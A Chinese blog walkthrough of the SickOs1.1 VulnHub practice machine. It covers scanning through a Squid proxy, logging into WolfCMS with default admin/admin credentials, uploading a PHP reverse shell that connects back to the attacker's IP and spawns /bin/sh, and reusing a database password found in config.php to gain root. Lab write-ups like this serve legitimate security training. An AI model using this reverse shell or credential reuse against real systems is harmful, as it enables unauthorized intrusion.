SickOs1.1实战

最新推荐文章于 2024-10-11 21:15:26 发布
最新推荐文章于 2024-10-11 21:15:26 发布
阅读量414 收藏 10
点赞数 3
文章标签: 网络安全 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66074761/article/details/142341388
版权

一、确定目标

靶机:SickOs1.1

arp-scan -l

image-20240918150327417

二、信息收集

1.端口扫描

经过扫描22,3128,8080三个端口开放

nmap 192.168.2311.150 -p- -sS -sV -A -T5

image-20240918150748403

2.访问网页

经过搜索,3128端口是走了一个Squid代理服务器,只要在浏览器插件添加一个代理即可

image-20240918152501685

image-20240918152536650

3.目录扫描

方式一:dirsearch

用dirsearch挂代理扫描

dirsearch -u http://192.168.231.150 --proxy=192.168.231.150:3128

image-20240918164626377

方式二:dirb

dirb http://192.168.231.150 -p http://192.168.231.150:3128

image-20240918182823070

三、漏洞探测

访问robots.txt文件,发现目录/wolfcms,拼接访问进入wolfcms页面

image-20240918165005711

直接上谷歌搜索wolfcms exp 漏洞,可以看到利用wplfcms的文件上传漏洞

image-20240918173302812

image-20240918173227439

四、漏洞利用

拼接访问/wolfcms/?/admin/plugin/file_manager/browse/

结果需要登录,百度搜索wolfcms默认密码为admin/admin

登陆成功,找到文件上传功能点

image-20240918173907464

选择上传phpshell.php,内容如下,在kali中开启监听端口,访问这个文件即可,拼接/wolfcms/public/phpshell.php(漏洞探测时有说明)即可

<?php
$sock=fsockopen('192.168.231.132',8888);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>

image-20240918175416029

如果用蚁剑连接的话,蚁剑需要设置代理才能连接成功

image-20240918184006557

五、权限提升

1.获得交互式shell

先看一下靶机有没有python,有就使用这条命令即可

python -c 'import pty; pty.spawn("/bin/bash")'

image-20240918175704376

2.收集提权信息

sudo -l 试了需要输入密码,但是我们没有,/etc/passwd可读不可写,/etc/shadow不可读

image-20240918180336485

那就找一下其他文件,找到config.php文件,一看这是数据库密码root john@123

image-20240918180441902

3.连接mysql

这里拿到了mysql数据库密码,连上数据库进去查表发现就一个管理员用户,没有发现有用信息

做到这里思路又没了,迫不得已看了一下攻略,居然直接查看passwd,寻找用户,尝试用数据库密码登录就成功了

4.passwd

到这里就拿到一个用户的账号和密码了

image-20240918181714960

image-20240918181802915

5.提权成功

image-20240918182244678

pandaCF
关注
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1953
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
SickOS1.1 - Shellshock原理和利用过程精讲
2301_82000839的博客
06-01 1003
nikto扫描出shellshock漏洞、使用curl指定代理服务器测试一下,正常,使用msfvenom生成bash的反弹shell,是初级权限用户,进行信息收集,自动化任务有提权方法,构造py再次获得反弹shell,再次拿到root。
Vulnhub靶机:SICKOS_ 1.1
LainWith的博客
12-09 684
SickOs(此系列共2台)发布日期:2015年12月11日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描代理扫描搜寻网站后台后台写入shell计划任务提权破壳漏洞拿shell。
SickOS1.1 - 穿越Squid代理的CMS渗透
2301_82000839的博客
05-31 1062
nmap扫描:8080、3128(代理服务器)、228080报错,但是界面有squid3.1.19应用;我们用搜索引擎了解之后是个代理服务器,主要是知道进入cms管理页面的网站位置、3128和8080在nmap都在指引去代理服务器、再次使用dirb等目录扫描工具暴露出新的目录浏览器配置、再次进入网站、弱密码进入管理界面权限、通过网站的简单漏洞进行phpshell反弹第一个用户是初始权限,通过config文件、机器信息、其他拥有bash权限用户、进一步登录sudo -l进行提权root。
靶机渗透练习39-SickOs2
hirak0的博客
04-18 956
靶机描述 靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ Description About Release Name........: SickOs1.2 Date Release: 26 Apr 2016 Author......: D4rk Series......: SickOs Objective...: Get /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt Tester(s)...: h1tch1, E
靶机渗透练习38-SickOs1
hirak0的博客
04-18 911
靶机描述 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ Description About Release Name........: SickOs1.1 Date Release: 11 Dec 2015 Author......: D4rk Series......: SickOs Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt Tester(s)...: h1tch1 Tw
Vulhub 刷题(一)
qq_45837896的博客
08-05 1660
vulnhub笔记
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2927
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
Vulnhub靶机系列:SickOs: 1.1
汗的博客
04-19 1189
这次的靶机是Vulnhub靶机: 靶机地址及相关描述 靶机设置 利用知识及工具 信息收集并getshell 提权 总结
OSCP - SickOS:1.1 writeup
Jiajiajiang_的博客
04-15 719
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover 地址为10.0.3.143 nmap nmap -sV -p- 10.0.3.143 漏扫 想了一下突破口肯定不是ssh,就从3128端口入手把...
Vulnhub系列-sick0s1.1
Yasso的博客
01-01 3447
靶机:192.168.12.130 kali: 192.168.249.128 一、信息收集 nmap -sV 192.168.12.130 –扫描开放端口 3128端口是作为代理 dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –扫下web目录 扫到robots.txt Wolf CMS 后台管理:?/admin 一试就出来了–弱口令:admin/admin Wolfcms 0.8.2中存在任意文件上传漏洞 weevely是适用
靶机渗透测试实战(十)——SickOs1.2渗透实战
橘子女侠
05-11 4585
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访...
(Vulnhub练习)---SICKOS: 1.2渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-03 2004
文章目录(Vulnhub练习)-- SICKOS: 1.2渗透实战下载地址主机发现目标ip192.168.100.159信息收集nmap端口扫描指纹识别路径扫描漏洞挖掘PUT方法任意写文件漏洞使用nmap脚本进行扫描漏洞利用php一句话木马 + 蚁剑连接nc反弹shellmsf反弹shellmsf改为php反弹shell本地提权查看靶机的版本及内核信息查看/etc/cron*下所含的所有文件查看chkrootkit的版本搜索chkrootkit 0.49版本漏洞查看提权步骤提权步骤:将当前用户(www-da
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8496
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
研发中台拆分之路:深度剖析、心得总结与经验分享
2301_77700816的博客
10-09 1286
这里的中台架构不是平台,也不是微服务,使用的是微服务架构,这两个是不一样的概述。中台建设开源项目 alinesno-cloud 开始,社区建议沉淀和企业实践 3 年左右,于 21 年进行拆分,指导思想为轻中台,小前台,大平台,为了更适应行业发展,更好的企业落地,整合出新中台模型,每个企业中台建设不一,这里针对的是自己带队建设过程,我有我思。以上为中台拆分过程的一些过程和思路,每个架构师或者技术负责人有自己的思路,上面是自己在整合过程的总结。
网络安全】将两个 Self-XSS 转变为可利用的 XSS
最新发布
等风来
10-11 50
一段时间后,我发现在任何字段中输入任何错误的内容,例如在Phone Number字段中输入 LingLongSec 然后提交表单,便可直接实现XSS,而不发生重定向。那么如何实现真实的危害呢?在提交表单时,我拦截了请求,再将该POST请求修改为GET请求,我发现服务器能够正确解析该请求,现在只需将一些参数置空即可。
网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 367
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
10-11 1206
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
OSCP渗透测试实战:VulnHub精选漏洞机器
此外,还有其他虚拟机如FristiLeaks 1.3、Stapler 1、VulnOS 2、SickOs 1.2等,它们涵盖了不同的主题,比如文件系统漏洞、Web应用漏洞以及恶意软件分析等。 HackLAB: Vulnix提供了另一个平台,让学习者在真实的黑客...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值